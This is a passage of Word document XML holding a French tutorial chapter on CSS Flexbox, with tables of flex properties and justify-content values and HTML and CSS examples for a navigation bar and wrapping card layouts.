            <w:tcW w:type="dxa" w:w="255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justify-content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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442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Répartition sur l'axe principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>align-items</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>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4422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alignement sur l'axe secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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align-content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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442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Lignes multiples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex-wrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>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4422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Passage à la ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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442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Espace entre enfants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex-grow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>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4422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Capacité à occuper l'espace libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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flex-shrink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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442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Capacité à rétrécir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex-basis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>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4422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille initiale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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align-self</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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442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Exception d'alignement</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`FLEX`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Raccourci de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flex-grow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flex-shrink</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flex-basis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flex: 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> signifie « prends l'espace disponible, rétrécis si nécessaire, base zéro ».</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>18.2 Aligner : les combinaisons utiles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>justify-content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> accepte six valeurs principales. Chacune correspond à une intention de composition, pas à un réglage arbitraire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Tableau 0.60 — Six valeurs de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>justify-content</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55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Valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex-start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alignés au début</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2891"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par défaut, listes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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flex-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Alignés à la fin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Actions secondaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>center</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Groupés au centre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2891"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Centrage d'un contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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space-between</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Écartés aux extrémités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Barre de navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>space-around</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Espaces égaux autour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2891"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étiquettes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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space-evenly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Espaces strictement égaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Menus courts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une barre simple à structurer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&lt;nav class="barre"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a class="barre__marque" href="/"&gt;Espritropic&lt;/a&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul class="barre__liens"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/cours"&gt;Cours&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/blog"&gt;Blog&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un conteneur flex dans un conteneur flex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.barre {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  justify-content: space-between;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  align-items: center;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-block: .75rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.barre__liens { display: flex; gap: 1.25rem; list-style: none; margin: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 0; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le centrage vertical, longtemps difficile, devient trivial : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display: flex; align-items: center; justify-content: center;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le conteneur suffit. C'est la raison principale de l'adoption massive de Flexbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>18.3 Flexibilité et rétrécissement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur tous les enfants produit des colonnes égales. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1 0 auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conserve la taille naturelle et n'autorise pas le rétrécissement. Ces nuances décident du comportement sur petit écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois comportements de flexibilité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.cartes { display: flex; gap: 1rem; }</w:t>
        <w:br/>
        <w:t>.carte { flex: 1 1 18rem; }   /* grandit, rétrécit, base 18rem */</w:t>
        <w:br/>
        <w:t>.carte--fixe { flex: 0 0 20rem; }  /* largeur imposée */</w:t>
        <w:br/>
        <w:t>.carte--large { flex: 2 1 24rem; } /* prend deux parts */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sur un téléphone, trois cartes à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deviennent trois colonnes de cent pixels : illisibles. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-wrap: wrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> les fait passer à la ligne, et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-basis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fixe la largeur minimale acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un passage à la ligne automatique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.cartes {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex-wrap: wrap;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.carte { flex: 1 1 18rem; max-width: 100%; }</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L'ÉLÉMENT QUI REFUSE DE RÉTRÉCIR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
